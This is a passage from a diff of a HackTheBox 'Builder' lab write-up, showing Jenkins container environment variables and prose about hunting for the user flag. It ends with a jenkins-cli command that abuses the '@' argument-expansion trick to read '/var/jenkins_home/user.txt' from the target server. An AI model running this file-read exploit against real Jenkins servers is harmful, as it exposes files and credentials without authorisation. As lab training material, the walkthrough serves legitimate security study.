3v401/HackTheBox/Builder/README.md

 13. REF=/usr/share/jenkins/ref
 14. PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

-Observe that we can analyze potential files in these environment variables, for exmaple, HOM, PATH, or JENKINS_HOME.
-Let' s try to find the user flag `user.txt` on these paths (I will only show the correct location to save time).
+Observe that we can analyze potential files (user.txt, root.txt) in these environment variables (HOME, PATH, or JENKINS_HOME) because that what we are targetting in this machine.
+Let' s try to find the user flag `user.txt` on these paths.

 ```
 java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' help "@/var/jenkins_home/user.txt"